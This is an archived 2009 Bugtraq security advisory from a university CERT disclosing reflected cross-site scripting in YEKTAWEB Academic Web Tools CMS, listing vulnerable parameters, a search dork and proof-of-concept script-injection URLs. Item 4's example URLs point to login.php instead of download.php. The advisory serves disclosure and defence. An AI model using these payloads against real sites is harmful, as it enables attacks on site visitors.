lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20090301115813.25631.qmail@securityfocus.com> Date: 1 Mar 2009 11:58:13 -0000 From: mr.faghani@...il.com To: bugtraq@...urityfocus.com Subject: YEKTA WEB Academic Web Tools CMS Multiple XSS ============================================ IUT-CERT ============================================ Title: Academic Web Tools CMS Multiple XSS Vendor: www.yektaweb.com Vulnerable Version: 1.5.7 and priors Type: XSS Fix: N/A Dork: AWT YEKTA ============================================ nsec.ir ============================================ Description: ------------------ YEKTAWEB Academic Web Tools is a Persian Content Management System (CMS) for managing university affairs such as conferences, journals and etc. The built-in filter of this package can not prevent XSS attack on some parameters. Vulnerabilities: ------------------ 1- Cross Site Scripting (XSS) in "/page.php" in "sid","logincase" and "redirect" parameters. http://yoursite/page.php?sid=[XSS] http://yoursite/page.php?logincase=[XSS] http://yoursite/page.php?redirect=[XSS] 2- Cross Site Scripting (XSS) in "/page_arch.php" in "sid","logincase" and "redirect" parameters. http://yoursite/page_arch.php?sid=[XSS] http://yoursite/page_arch.php?logincase=[XSS] http://yoursite/page_arch.php?redirect=[XSS] 3- Cross Site Scripting (XSS) in "/login.php" in "sid" ,"logincase" and "redirect" parameters. http://yoursite/login.php?sid=[XSS] http://yoursite/login.php?logincase=[XSS] http://yoursite/login.php?redirect=[XSS] 4- Cross Site Scripting (XSS) in "/download.php" in "sid" ,"logincase" and "redirect" parameters. http://yoursite/login.php?sid=[XSS] http://yoursite/login.php?logincase=[XSS] http://yoursite/login.php?redirect=[XSS] Exploit/PoC: ------------------ Example: http://yoursite/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa http://yoursite/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script> http://yoursite/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script> Solution: ------------------ Input Validation Filter should be patched. Credit: ------------------ Isfahan University of Technology - Computer Emergency Response Team Thanks to : M. R. Faghani, N. Fathi, E. Aerabi, E. Jafari
Powered by blists - more mailing lists